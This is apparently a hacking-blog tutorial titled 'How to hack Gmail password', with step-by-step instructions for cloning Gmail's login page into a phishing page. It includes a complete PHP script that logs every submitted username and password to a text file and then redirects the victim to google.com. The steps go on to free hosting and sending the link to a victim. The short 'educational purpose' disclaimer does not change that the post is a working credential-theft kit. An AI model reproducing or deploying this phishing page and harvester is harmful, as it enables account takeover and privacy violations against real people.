1058 followers
Follow us on Twitter!
260 followers
Join us on Facebook!
How to hack Gmail password:To Create a fake page for any website is known as Phishing Attack. It can be for various websites e.g Facebook, Twitter,Gmail, Yahoo, Hotmail etc. I have received many emails regarding fake/phisher page so this post is to clear doubts andproblems regarding Fake Page For Any Website. This is for educational purpose we are not responsible for any illegal activity.
.
Step 1:
- Open Gmail.com
- Right click in an empty space on Page and Click view page source.
- Copy all Content to Notepad & save it as Gmail.html
.
Step 2:
- Open Gmail.html with Notepad.
- Press (Ctrl + f ) to Search “action=”https “
.
Step 3:
- Replace this Syntax https://accounts.google.com/ServiceLoginAuth to login.php
- Likewise change Method = “Post” to “GET” and Finally Save it.
.
- After Replacements It will Look like this.
.
.
Step 4:
- As we Have to create login.php, So
- Open New Notepad & Copy Paste this following Code and Save it as login.php
<?php header ('Location: http://www.google.com'); $handle = fopen("log.txt", "a"); foreach($_GET as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?>
.
Step 5:
- Victim will be redirects to http://www.google.com as he Clicks on Login button.
- You can change redirect button to any address you want.
.
Step 6:
- Create a Free hosting account on 000webhost.com or T35.com
- How to make account & upload there Read this tutorial How-to-HACK-by Fake PAGE
.
Also Check : More HACKING Trick HERE
.
Step 7:
- Upload both Files Gmail.html & login.php
.
Step 8:
- Now Send Gmail.html Link to Victim.
- Once he Clicks Login Button, He will be redirected to Google.com, You can also change the site with your own desire.
.
Step 9:
- File named log.txt will appear. Containing Victim’s Email and Password.
.
Step 10:
- Congrats You have Just Learns How to HACK Gmail password.
- Hope you enjoyed this Tutorial. Like us on FaceBook.





0 comments: